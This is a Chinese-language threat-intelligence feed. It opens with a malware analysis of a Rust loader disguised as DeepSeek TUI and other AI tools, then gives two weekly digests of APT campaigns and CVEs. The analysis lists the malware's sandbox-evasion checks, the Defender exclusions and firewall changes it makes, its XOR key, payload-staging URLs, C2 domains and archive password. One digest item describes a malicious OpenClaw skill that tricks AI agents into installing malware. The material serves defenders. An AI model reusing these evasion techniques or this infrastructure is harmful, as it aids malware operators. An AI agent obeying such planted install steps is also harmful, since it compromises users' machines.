样本的运行环境检测系统采用分层评分架构：TIER0（致命指标一票否决）+ TIER1/2（可疑指标积分制）。此外，后续下载的二阶段恶意软件OneSync.exe中同样存在反沙箱模块，包含”src\anti_bot.rs”、”TIER0: VirtualBox default NAT IP (10.0.2.15) detected”、”TIER0: Bot farm hostname pattern”等字符串，说明反沙箱不只存在于一级样本，二阶段组件还会独立进行环境判定。

（1） TIER0阶段检测，存在黑名单信息则直接判定为沙箱环境。

检测项	黑名单信息
虚拟机关键词	hyper-v、vmware、qemu、virtualbox、parallels（大小写不敏感）
进程检测	包含ollydbg.exe、x32dbg.exe、x64dbg.exe、windbg.exe、ida.exe、ida64.exe、processhacker.exe、procexp.exe、procexp64.exe、wireshark.exe、fiddler.exe、charles.exe、sandboxie.exe、vmtoolsd.exe、vmwaretray.exe、vmwareuser.exe、vboxservice.exe、vboxtray.exe
沙箱监控DLL检测	包含cuckoomon.dll（Cuckoo 沙箱）、SbieDll.dll（Sandboxie）、SxIn.dll、cmdvrt32.dl、cmdvrt64.dll（Comodo 沙箱）加上VM驱动文件vmouse.sys、vmhgfs.sys、VBoxMouse.sys、VBoxGuest.sys、VBoxSF.sys、VBoxVideo.sys、Wasp.sys
黑名单用户名检测	包含malware、virus、sandbox、sand box、wdagutilityaccount、sample、currentuser、maltest、bruno、jzdekker、Janet Van Dyne、Harry Johnson
VirtualBox默认 NAT IP 检测	硬编码 IP 地址10.0.2.15
VM MAC OUI 检测	MAC 地址前缀黑名单包含 08:00:27（VirtualBox）、00:15:5D（Hyper-V）、52:54:00（KVM/QEMU）、00:23:45，覆盖主流虚拟化平台的默认 MAC 地址前缀
Bot farm主机名模式检测	黑名单中还预置了大量仿真实Bot farm主机名（eslmdigB、kismujmC、gpslqmrD，按字母表顺序排列的 8 字符随机串）
GPU预筛查	枚举 HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}下显示适配器子键的 DriverDesc 值，用于识别 hyper-v、vmware、virtualbox、parallels、qemu 等虚拟化显卡。

（2）通过TIER0阶段检测的系统进入积分评估阶段，分值越大越可能是沙箱环境。

检测项	评分值
GPU评分	1. 高可疑分，沙箱 GPU 黑名单：microsoft basic display adapter、vmware svga、virtualbox graphics、hyper-v video、qemu; 2. 真实用户特征减分，合法 GPU 白名单：geforce rtx 2/3/4、geforce gtx 10/16、radeon rx 5/6/7、quadro、radeon pro、rtx a、intel(r) uhd/iris/hd graphics、amd radeon(tm) graphics; 3. 无GPU信息，加分
CPU评分	Xeon/EPYC→可疑；CPU核心数四级评分：<2(最高风险)/=2/4-7/>7(减分)
内存大小	<3.5GB(极可疑)/3.5-4.5/≥8(减分)/≥16(更减分)
磁盘大小	系统盘<40GB或>200GB→加分；精确500GB/250GB→高疑似沙箱环境
软件数	四级评分：<30(CRITICAL)/30-49/50-79/≥200(减分)
进程数	四级评分：<60(极可疑)/60-99/100-299/≥300(减分)
分辨率	800x600/1024x768/1280x720→加分；1920x1080→减分
BIOS序列号黑名单	ete9t8e8t3/H6MBDR4/0311-3550-2146-3025-5233-5781-38/0/1234567890（沙箱/模板化环境常见序列号）
BIOS关键词	seabios/bochs/qemu/vrtual/hyper-v/vmware/google/vbox/innotek（虚拟化平台 BIOS 字符串）
VM主板	VirtualBox/Google Compute Engine/Virtual Machine（关键命中级）
开机时间检测	<5min→加分

（3）即使通过上述全部检测，最后还有一个鼠标移动检测，才会触发后续恶意行为。下载的二阶段组件svc_service.exe同样存在该鼠标检测逻辑。

样本如果检测到运行环境不符合要求，会弹出提示信息：”Sorry, your system does not meet the minimum requirements.”，然后结束运行。

（二）安全防护关闭

如果环境检测通过，执行如下powershell代码。

异或解密后如下。

主要功能是关闭一些Windows Defender安全防护，包括

(1) 添加6个排除路径，C:\Users、$env:TEMP、C:\ProgramData、C:\OneDriveTemp、C:\Users\Public、C:\Windows

(2) 排除进程powershell.exe和pwsh.exe

(3) MAPS 报告关闭、云阻断关闭、样本提交NeverSend、云保护等级归零、PUA 保护 disable、IOAV 保护 disable、行为监控 disable

(4) 防火墙开放57001/57002/56001三个入站端口

（三）字符串解密与后续载荷获取

函数sub_1400F22F5异或解密字符串，使用的key为” xnasff3wcedj”。

样本获取后续载荷的链接通过字符串解密得到，两个链接一个是主地址，一个是备用地址。

hxxps://pastebin.com/raw/w6BVFFWQ

hxxps://snippet.host/beuskq/raw

两者各存放6个Azure云盘链接，指向7z压缩包，部分链接一致（不一致的用红色标识）。

hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0311/0504vicloud.7z&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true

hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0507/0507autodate.7z&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true

hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0207/0207Up16OneSync.7z&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true

hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0207/0207Up17WinHealhCare.7z&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true

hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0222/0224GHonedrive_sync.7z&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true

hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0311/svc_service.7z&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true

hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0311/0504dbau.7z&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true

hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0207/0207Up17WinHealhCare.7z&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true

hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0207/0207Pureservice.7z&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true

样本中的其他解密字符串如下：

字符串	说明
hxxps://pastebin.com/raw/5tmHDYrf	存放链接hxxps://github.com/mountains-and-lakes/mountains/releases/download/mountains/lednew.7z
hxxps://mikolirentryifosttry.info/api/check/	C2 URL
#Soft0427	和发送Telegram消息有关
hxxps://hkdk.events/djbk1i9hp0sqoh	和发送Telegram消息有关
-1003724698225	和发送Telegram消息有关
hxxps://pastebin.com/raw/M6KthA5Z	存放解压后续载荷的密码，"8TDk2FBsKG5UN2NNc3p"
hxxps://snippet.host/uikosx/raw	存放解压后续载荷的密码，"8TDk2FBsKG5UN2NNc3p"
8TDk2FBsKG5UN2NNc3p	解压后续载荷的密码

（四）二阶段组件

获取的部分二阶段组件信息如下

文件名	PE创建时间	说明
OneSync.exe/WinHealhCare.exe	2026-02-07	安装编排+计划任务+TG回传
onedrive_sync.exe	2026-02-24	Run持久化+memexec（唯一32位组件）
vicloud.exe	2026-05-04	配置服务主题轻量加载器
svc_service.exe	2026-05-06	服务化驻留+CLR宿主+NT注入
autodate.exe	2026-05-07	服务管理器主题轻量加载器

下载的后续载荷连接C2：zkevopenanu[.]cfd。

(1) OneSync.exe / WinHealhCare.exe

两者为同模版变种——相同OEP地址0x1CA7DC、相同核心字符串、相同TG凭据、相同计划任务框架。WinHealhCare.exe的拼写为Healh，而非Health。

计划任务伪装名如下，可选的17个任务名覆盖浏览器同步、云同步、显卡驱动、系统维护。

通过Telegram上报状态。

本地开启34254端口并绑定socket监听，用于实现组件之间的协调。

（2）svc_service.exe

该组件是驻留核心，大部分核心逻辑在函数sub_140004968中。

该组件具有通过计划任务、注册表RUN键、Winlogon用户初始化、Startup快捷方式等4种模式实现持久化驻留的能力。

通过netsh命令执行”advfirewall firewall add rule”，添加对56001/57001/57002 三个端口的防火墙规则，与一阶段样本powershell放行端口一致。

在进程中加载CLR（clroxide v1.1.1），完全在内存执行.NET assembly，相关字符串如下:

[*] Loading CLR with clroxide...

[+] CLR loaded successfully

[*] Executing assembly...

Could not retrieve ICLRMetaHost

[-] Failed to get CLR context:

[-] Failed to create CLR instance:

通过NT syscall实现线程注入，直接用syscall的方式调用SuspendThread、SetThreadContext、NtCreateNamedPipeFile、NtWriteFile。

该组织也存在鼠标检测功能，具有字符串”[*] Checking for user activity (Mouse)...”，”[+] User activity detected.”，保证运行环境是真实受害者系统。

(3) onedrive_sync.exe

这是个32位（x86）组件，主函数sub_402EB0，主要功能为：建立互斥→复制到伪装路径→Run键自启动→WaitableTimer延时→memexec内存装载后续PE。攻击者不需要把全部希望押在 svc_service.exe 的高权限驻留——不适合服务化驻留的主机仍然靠Run键+内存执行维持攻击链条。

(4) autodate.exe

该组件伪装为服务管理器，实际上是通过NtAllocateVirtualMemory、NtProtectVirtualMemory、UnsupportedDotNetExecutable、memexec、GetProcAddress、CreateWaitableTimerExW等函数将后续载荷加载进内存执行。伪装配置如下：

(5) vicloud.exe

功能与autodate.exe高度相似，伪装配置不同。

溯源关联

该恶意软件的攻击方式与仿冒OpenClaw的恶意软件[1, 2]如出一辙，并且样本使用的下载URL和C2域名也有重叠，表明此次仿冒DeepSeek TUI项目的恶意软件是长期攻击活动的一部分。

根据样本携带的PDB路径"ClawCode.pdb"，关联到多个类似的用Rust编写的恶意文件，大部分仿冒名称都与AI相关。

MD5	编译时间	仿冒名称
7de2896e373342e0f3b765c855bf7396	2026-04-29 08:30:56 UTC	bbg_free_x64.exe
78c11c45c00a9c22f537c59a472beca1	2026-04-27 11:47:52 UTC	CatGatekeeper_x64.exe
df36a31148d2c6414bdafeab771ea728	2026-04-27 12:32:54 UTC	CatGatekeeper_x64.exe
14920c9751d20452a1006d20b8e73234	2026-04-27 13:44:27 UTC	CatGatekeeper_x64.exe
f6d328422e7ca22e70a6aa71315450f3	2026-04-29 08:37:03 UTC	CatGatekeeper_x64.exe
86c7f2a3c307928daaca7c1df3ea5d72	2026-04-29 08:38:34 UTC	CatGatekeeper_x64.exe
dbaa133fd3d1a834460206d83b480f80	2026-04-27 12:36:35 UTC	ClaudeDesign-Optimized_x64.exe
22c0c7d441fd22432cfe7854b59ba82b	2026-04-29 08:43:07 UTC	ClaudeDesign-Optimized_x64.exe
a224f44bdac16250d8093df68e05b512	2026-04-29 08:40:05 UTC	DeepSeek-TUI_x64.exe
6861fa47889e0340ab7efaab448c56b6	2026-04-29 08:41:36 UTC	DeepSeek-TUI_x64.exe
437e4bdb12d7fa8d1c9a9e9db84b8726	2026-04-29 09:22:41 UTC	DeepSeek-TUI_x64.exe
fbfe7513685913e6f878647eec429d45	2026-04-27 11:59:59 UTC	deepseek-v4-pro_x64.exe
562d48524313d414b5a419fed6ca10aa	2026-04-29 09:30:25 UTC	DV4-MCP-Setup.exe
df8a2e7aa46af996bdf67d79601671c3	2026-04-27 12:38:22 UTC	fraudGPT_x64.exe
f101a346502a324320f952d39e217064	2026-04-29 09:52:02 UTC	fraudGPT_x64.exe
5d14461718b74b86fdd68c6aee801dc4	2026-04-29 09:28:47 UTC	GLM5-Local_x64.exe
556b35236eeb111b0606d88a7aa3fd87	2026-04-27 11:58:08 UTC	gpt-image-2-desktop.exe
ff371b43786cbb87dab325ce17cf8b7c	2026-04-29 08:46:08 UTC	gpt-image-2-desktop.exe
1bd1df4f228ecd29a9b6fab48beaa366	2026-04-29 09:34:59 UTC	GrokCLI_x64.exe
975bd8eb56716adbcadb5216592a17c7	2026-04-27 12:21:56 UTC	Hermes-Agent_x64.exe
347980085c8926d5a1ff8e15a31fd812	2026-04-29 09:19:34 UTC	Hermes-Agent_x64.exe
46917d8326d77e4e3c39cb843dbfc675	2026-04-27 12:40:09 UTC	KawaiiGPT_x64.cpl.exe
b6f77b48223f57c67f00ccd8ab3d047e	2026-04-29 09:50:26 UTC	KawaiiGPT_x64.exe
8dde7a417130ae78a3f2aeed1f5b8f58	2026-04-27 13:50:42 UTC	Kimi-K2.6_x64.exe
4c7abc81b308fc874ec0de4f026db260	2026-04-29 09:21:03 UTC	Kimi-K2.6_x64.exe
48dd212fae0086822d4ae7696cc61693	2026-04-27 11:51:02 UTC	LTX-2.3_x64.exe
faa5f780fb0e0786dd1a2bd19af290ca	2026-04-27 12:34:44 UTC	opus-4-7_x64.exe
6721f30d84f58532d877f2b31bfc9162	2026-04-29 09:25:41 UTC	opus-4-7_x64.exe
a9d492ab22400257f756f0308e06f04c	2026-04-29 08:32:28 UTC	worldmonitor_x64.exe
d0a92b090279894f4628bc3d627fbde0	2026-04-29 09:56:46 UTC	WormGPT_x64.exe

总结

从OpenClaw到DeepSeek TUI，以及其他不断占据话题热榜的AI产品，恶意软件也追逐热点，不断改头换面。通过样本特征关联，我们发现这些恶意软件背后疑似存在着同一个持续活动的攻击团伙，不断借助AI话题发起攻击。

IOC

MD5

b96c0d609c1b7e74f8cb1442bf0b5418

7de2896e373342e0f3b765c855bf7396

78c11c45c00a9c22f537c59a472beca1

df36a31148d2c6414bdafeab771ea728

14920c9751d20452a1006d20b8e73234

f6d328422e7ca22e70a6aa71315450f3

86c7f2a3c307928daaca7c1df3ea5d72

dbaa133fd3d1a834460206d83b480f80

22c0c7d441fd22432cfe7854b59ba82b

a224f44bdac16250d8093df68e05b512

6861fa47889e0340ab7efaab448c56b6

437e4bdb12d7fa8d1c9a9e9db84b8726

fbfe7513685913e6f878647eec429d45

562d48524313d414b5a419fed6ca10aa

df8a2e7aa46af996bdf67d79601671c3

f101a346502a324320f952d39e217064

5d14461718b74b86fdd68c6aee801dc4

556b35236eeb111b0606d88a7aa3fd87

ff371b43786cbb87dab325ce17cf8b7c

1bd1df4f228ecd29a9b6fab48beaa366

975bd8eb56716adbcadb5216592a17c7

347980085c8926d5a1ff8e15a31fd812

46917d8326d77e4e3c39cb843dbfc675

b6f77b48223f57c67f00ccd8ab3d047e

8dde7a417130ae78a3f2aeed1f5b8f58

4c7abc81b308fc874ec0de4f026db260

48dd212fae0086822d4ae7696cc61693

faa5f780fb0e0786dd1a2bd19af290ca

6721f30d84f58532d877f2b31bfc9162

a9d492ab22400257f756f0308e06f04c

d0a92b090279894f4628bc3d627fbde0

(二阶段组件)

397405106d895815a9bef8d84445af5a (OneSync.exe)

b7a76b82c2a5e16a3c346cc6aa145556 (WinHealhCare.exe)

f01e96a80f92c414dd824aef5a1ac1e7 (onedrive_sync.exe)

ecb3e753b60cc0f3d7de50fe7f133e49 (svc_service.exe)

68ba5a1bafae7db35e2eee7ea3f11882 (autodate.exe)

e102797eb4225a93eaeeaa6b9979716a (vicloud.exe)

C&C

mikolirentryifosttry.info

zkevopenanu.cfd

URL

hxxps://pastebin.com/raw/w6BVFFWQ

hxxps://pastebin.com/raw/5tmHDYrf

hxxps://pastebin.com/raw/M6KthA5Z

hxxps://snippet.host/beuskq/raw

hxxps://snippet.host/uikosx/raw

hxxps://hkdk.events/djbk1i9hp0sqoh

参考链接

https://mp.weixin.qq.com/s/jNYCA9G1jSkevgPWv4Ov_Q

https://www.netskope.com/blog/openclaw-hologram-fake-installer-ships-rust-infostealer

阅读原文

跳转微信打开

每周高级威胁情报解读(2026.05.01~05.07)

Fri, 08 May 2026 10:30:00 +0800

威胁情报中心 2026-05-08 10:30 北京

Silver Fox 利用新的 ABCDoor 后门攻击俄罗斯和印度；ScarCruft 通过供应链攻击破坏游戏平台；OceanLotus 被怀疑使用 PyPI 传播 ZiChatBot 恶意软件；研究发现 MuddyWater 与一起Chaos勒索软件攻击有关

2026.05.01~05.07

攻击团伙情报

Silver Fox 利用新的 ABCDoor 后门攻击俄罗斯和印度
ScarCruft 通过供应链攻击破坏游戏平台
OceanLotus 被怀疑使用 PyPI 传播 ZiChatBot 恶意软件
研究发现 MuddyWater 与一起Chaos勒索软件攻击有关

攻击行动或事件情报

Operation Silent Rotor 在莫斯科峰会前夕针对无人机行业进行攻击
东南亚军事实体成为 cPanel(CVE-2026-41940) 攻击目标
恶意 Intercom PHP 包通过 Composer 插件向 Packagist 传播Mini Shai-Hulud 攻击
钓鱼活动滥用受信任的谷歌服务劫持数万个 Facebook 帐户
新型网络钓鱼活动瞄准美国窃取凭证
DAEMON Tools软件感染自2026年4月8日起持续进行

恶意代码情报

人工智能驱动的一体化网络钓鱼工具包Bluekit
CloudZ RAT 利用 Pheno 插件窃取 OTP 消息
恶意 OpenClaw 技能分发 Remcos RAT 和 GhostLoader
InstallFix 攻击活动利用伪造的 Claude AI 安装页面诱骗用户运行恶意软件

漏洞情报

CVE-2026-31431：复制失败漏洞允许跨云环境提升 Linux root 权限
Android ADB over TCP 认证路径中存在严重无交互远程代码执行漏洞

攻击团伙情报

Silver Fox 利用新的 ABCDoor 后门攻击俄罗斯和印度

披露时间：2026年4月30日

情报来源：https://securelist.com/silver-fox-tax-notification-campaign/119575/

相关信息：

Silver Fox威胁组织通过伪装成印度和俄罗斯税务通知的钓鱼邮件，利用修改版RustSL加载器投放ValleyRAT后门，进而部署此前未公开的Python后门ABCDoor。ABCDoor基于Socket.IO通信，具备屏幕广播、文件管理、远程控制、持久化等能力，其C2域名常含abc前缀，自2024年底起持续演化，主要针对工业、咨询、零售等行业组织。

ScarCruft 通过供应链攻击破坏游戏平台

披露时间：2026年5月5日

情报来源：https://www.welivesecurity.com/en/eset-research/rigged-game-scarcruft-compromises-gaming-platform-supply-chain-attack/

相关信息：

APT组织ScarCruft通过入侵中国延边地区的游戏平台sqgame，在Windows客户端更新包和安卓游戏安装包中植入恶意代码，传播Windows版RokRAT后门及新发现的Android版BirdCall后门，该后门支持收集联系人、短信、文件、屏幕截图和录音等间谍功能，主要针对延边朝鲜族人群及脱北者。

OceanLotus 被怀疑使用 PyPI 传播 ZiChatBot 恶意软件

披露时间：2026年5月6日

情报来源：https://securelist.com/oceanlotus-suspected-pypi-zichatbot-campaign/119603/

相关信息：

海莲花组织疑似通过PyPI上传恶意wheel包，伪装成uuid32-utils、colorinal等正常库，依赖安装后释放DLL或SO格式的释放器，进而部署新型后门ZiChatBot。该后门利用Zulip聊天应用的REST API作为命令与控制服务器，接收并执行shellcode，同时通过注册表或计划任务实现持久化，以发起供应链攻击。

研究发现 MuddyWater 与一起Chaos勒索软件攻击有关

披露时间：2026年5月6日

情报来源：https://www.rapid7.com/blog/post/tr-muddying-tracks-state-sponsored-shadow-behind-chaos-ransomware/

相关信息：

APT组织MuddyWater伪装成Chaos勒索软件，通过Microsoft Teams进行社交工程和屏幕共享，诱导用户输入凭证并操纵多因素认证，随后利用DWAgent等远程管理工具建立持久化访问，并部署名为Game.exe的自定义后门，在未实际加密文件的情况下窃取数据并实施勒索，所使用的代码签名证书等证据表明这是一起国家支持的网络间谍活动。

攻击行动或事件情报

Operation Silent Rotor 在莫斯科峰会前夕针对无人机行业进行攻击

披露时间：2026年5月6日

情报来源：https://www.seqrite.com/blog/operation-silent-rotor-rust-malware-unmanned-aviation-sector/

相关信息：

研究人员披露名为"Operation Silent Rotor"的攻击活动，攻击者通过钓鱼邮件发送名为cai partner.zip的压缩包，内含Rust编写的恶意可执行文件及多个诱饵文档，诱使目标执行后展示伪装成订单确认的俄语文档，同时收集主机名、IP地址等系统信息并加密发送至C2服务器，随后下载并执行第二阶段载荷，该活动瞄准欧亚无人航空领域，时间上对应莫斯科无人航空论坛。

东南亚军事实体成为 cPanel(CVE-2026-41940) 攻击目标

披露时间：2026年5月2日

情报来源：https://ctrlaltintel.com/research/SEA-CPanel/

相关信息：

攻击者利用cPanel认证绕过漏洞CVE-2026-41940，针对菲律宾、老挝等东南亚国家的政府与军事机构以及托管服务提供商进行交互式入侵。攻击者使用公开漏洞利用代码，同时针对印度尼西亚国防培训门户开发了自定义SQL注入至RCE的链式攻击。通过OpenVPN和Ligolo建立持久化隧道后，攻击者成功窃取了中国铁路学会电气化委员会约4.37GB的敏感文件，包含铁路技术资料及人员身份与银行信息，C2采用AdaptixC2。

恶意 Intercom PHP 包通过 Composer 插件向 Packagist 传播Mini Shai-Hulud 攻击

披露时间：2026年4月30日

情报来源：https://semgrep.dev/blog/2026/malicious-intercom-php-package-spreads-mini-shai-hulud-attack-to-packagist-via-composer-plugin/

相关信息：

攻击者劫持了Packagist上的intercom/intercom-php包，在5.0.2版本中植入恶意Composer插件，安装期间会下载Bun JavaScript运行时并执行混淆的凭证窃取载荷，窃取GitHub令牌、SSH密钥、云凭证和环境变量后加密外泄，这是Mini Shai-Hulud攻击从npm扩展到PHP生态的最新活动。

钓鱼活动滥用受信任的谷歌服务劫持数万个 Facebook 帐户

披露时间：2026年4月29日

情报来源：https://guard.io/labs/accountdumpling---hunting-down-the-google-sent-phishing-wave-compromising-30-000-facebook-accounts

相关信息：

攻击者滥用Google AppSheet的通知系统，发送经过完整SPF、DKIM和DMARC认证的虚假邮件，冒充Meta官方通知，诱骗Facebook用户访问Netlify、Vercel或Google Drive上的钓鱼页面，窃取登录凭证、双重验证码、身份证照片等敏感信息，并通过Telegram机器人实时接收被盗数据，部分页面还采用WebSocket实现人工操控。该活动已导致约三万个账户被盗，大部分受害者位于美国，溯源指向一名越南籍人员Pham Tai Tan及其关联的服务网站。

新型网络钓鱼活动瞄准美国窃取凭证

披露时间：2026年5月5日

情报来源：https://any.run/cybersecurity-blog/us-fake-invitation-phishing/

相关信息：

ANY.RUN研究人员发现一场针对美国跨行业机构的大规模钓鱼活动，攻击者利用可重复使用的钓鱼框架批量部署假活动邀请函页面，通过CAPTCHA验证后诱导受害者输入邮箱凭证与OTP验证码，或自动下载ScreenConnect、ITarian、Datto RMM等合法远程管理工具，进而实现账户接管或未经授权的远程访问。

DAEMON Tools软件感染自2026年4月8日起持续进行

披露时间：2026年5月5日

情报来源：https://securelist.com/tr/daemon-tools-backdoor/119654/

相关信息：

DAEMON Tools软件的合法安装程序自2026年4月8日起被植入恶意载荷，攻击者通过信息收集器获取受感染系统的MAC地址、进程列表等指纹信息，并有选择地向俄罗斯、白俄罗斯和泰国的政府、科研及制造业等少数目标部署更复杂的后门。

恶意代码情报

人工智能驱动的一体化网络钓鱼工具包Bluekit

披露时间：2026年4月29日

情报来源：https://www.varonis.com/blog/bluekit

相关信息：

Varonis Threat Labs发现名为Bluekit的新型AI驱动全能钓鱼工具包，它将40余种网站模板、自动域名注册、双因素认证绕过、反机器人伪装、地理位置模拟及AI助手等功能整合至单一面板，使攻击者能够快速构建并运营针对邮箱、云账户、开发者平台、社交媒体及加密货币服务的高仿真钓鱼活动。

CloudZ RAT 利用 Pheno 插件窃取 OTP 消息

披露时间：2026年5月5日

情报来源：https://blog.talosintelligence.com/cloudz-pheno-infostealer/

相关信息：

Cisco Talos研究人员披露了一场自2026年1月起持续活跃的入侵活动，攻击者利用模块化远控木马CloudZ及其Pheno插件，通过滥用Windows内置的Phone Link应用窃取受害者凭证与认证码。攻击链始于伪装成ScreenConnect更新的恶意可执行文件，释放Rust编译的加载器后部署伪装成文本文件的.NET加载器，后者通过创建名为SystemWindowsApis的计划任务并滥用regasm.exe实现持久化，执行前进行多重反分析检测。CloudZ采用ConfuserEx混淆，通过加密TCP套接字连接C2服务器，支持浏览器凭证窃取、屏幕录制、插件加载等命令，并从Pastebin或Cloudflare Workers获取二级配置。Pheno插件专门扫描YourPhone、PhoneExperienceHost等Phone Link相关进程，识别PC与手机间的本地代理连接，进而访问存储同步短信与通知数据的SQLite数据库，使攻击者能够在不感染移动设备的情况下拦截短信OTP和认证应用通知，从而绕过基于短信的多因素认证，将攻击面从手机转移至企业管理的Windows终端。

恶意 OpenClaw 技能分发 Remcos RAT 和 GhostLoader

披露时间：2026年5月5日

情报来源：https://www.zscaler.com/blogs/security-research/malicious-openclaw-skill-distributes-remcos-rat-and-ghostloader

相关信息：

攻击者利用OpenClaw框架的恶意技能DeepSeek-Claw，通过伪造的安装指令诱导用户或AI代理执行，在Windows上使用DLL侧载和内存加载器部署Remcos远控木马，在macOS和Linux系统上通过Node.js载荷安装GhostLoader信息窃取器，以窃取凭证、加密货币钱包和敏感数据。

InstallFix 攻击活动利用伪造的 Claude AI 安装页面诱骗用户运行恶意软件

披露时间：2026年5月5日

情报来源：https://www.trendmicro.com/en_us/research/26/e/installfix-and-claude-code.html

相关信息：

攻击者利用Google Ads推广伪造的Claude AI安装页面，诱导用户复制运行恶意PowerShell命令，通过mshta.exe下载ZIP与HTA混合文件，执行VBScript并绕过AMSI和SSL证书验证，最终在内存中执行shellcode，收集浏览器和电子钱包数据，同时创建计划任务实现持久化。

漏洞情报

CVE-2026-31431：复制失败漏洞允许跨云环境提升 Linux root 权限

披露时间：2026年5月1日

情报来源：https://www.microsoft.com/en-us/security/blog/2026/05/01/cve-2026-31431-copy-fail-vulnerability-enables-linux-root-privilege-escalation/

相关信息：

Linux内核加密子系统存在本地权限提升漏洞CVE-2026-31431，非特权用户可通过AF_ALG和splice系统调用实现内核页缓存的4字节覆写，破坏任意可读文件的内存缓存，从而将权限提升至root。该漏洞影响2017年以来的几乎所有Linux发行版及云环境，已出现可利用的PoC，厂商已发布补丁或建议禁用AF_ALG模块。

Android ADB over TCP 认证路径中存在严重无交互远程代码执行漏洞

披露时间：2026年5月5日

情报来源：https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/

相关信息：

CVE-2026-0073是Android调试桥adbd在TLS客户端认证路径中的严重漏洞，攻击者可在无需交互的情况下，通过发送非RSA类型的证书，利用EVP_PKEY_cmp返回值处理错误绕过认证，从而获得shell用户权限的远程代码执行能力。

点击阅读原文至ALPHA 9.3

即刻助力威胁研判

阅读原文

跳转微信打开

每周高级威胁情报解读(2026.04.24~04.30)

Fri, 01 May 2026 10:31:00 +0800

威胁情报中心 2026-05-01 10:31 北京

BlueNoroff 利用 ClickFix、无文件 PowerShell 和 AI 生成的虚假 Zoom 会议攻击 Web3 行业；与Lazarus有关联的 npm 恶意软件攻击活动涉及 108 个恶意软件包；Kimsuky组织针对处方药公司进行攻击

2026.04.24~04.30

攻击团伙情报

BlueNoroff 利用 ClickFix、无文件 PowerShell 和 AI 生成的虚假 Zoom 会议攻击 Web3 行业
与Lazarus有关联的 npm 恶意软件攻击活动涉及 108 个恶意软件包
Kimsuky组织针对处方药公司进行攻击
ShadowBrokers泄露中的神秘引用揭示Stuxnet五年前的高精度软件破坏框架"fast16"
蔓灵花组织使用NUITKA打包的python样本进行投递
Lazarus 利用人工智能将对开发者的攻击产业化

攻击行动或事件情报

攻击者会冒充 IT 或技术支持人员实施数据窃取
攻击者利用macOS原生功能实现“离地”攻击
伪装成TikTok视频下载器的扩展程序窃取13万用户数据
又又一起AI相关供应链事件：Xinference PyPI (版本 2.6.0–2.6.2)供应链污染报告
PhantomCLR 行动：通过应用程序域劫持和内存中 .NET 滥用进行隐蔽执行

恶意代码情报

GlassWorm 恶意软件通过 73 个 OpenVSX "沉睡者"扩展卷土重来
PhantomRPC：Windows RPC 中的一种新的权限提升技术
UNC6692 利用社会工程学部署定制恶意软件套件
UAT-4356 针对 Cisco Firepower 设备的目标
供应链攻击永无眠：SAP CAP & Cloud MTA npm 供应链攻击事件报告

漏洞情报

GNU nano 软件中存在CVE-2026-40556漏洞
APT28 零日漏洞补丁不完整导致 CVE-2026-32202 的出现

攻击团伙情报

BlueNoroff 利用 ClickFix、无文件 PowerShell 和 AI 生成的虚假 Zoom 会议攻击 Web3 行业

披露时间：2026年4月27日

情报来源：https://arcticwolf.com/resources/blog/bluenoroff-uses-clickfix-fileless-powershell-and-ai-generated-zoom-meetings-to-target-web3-sector/

相关信息：

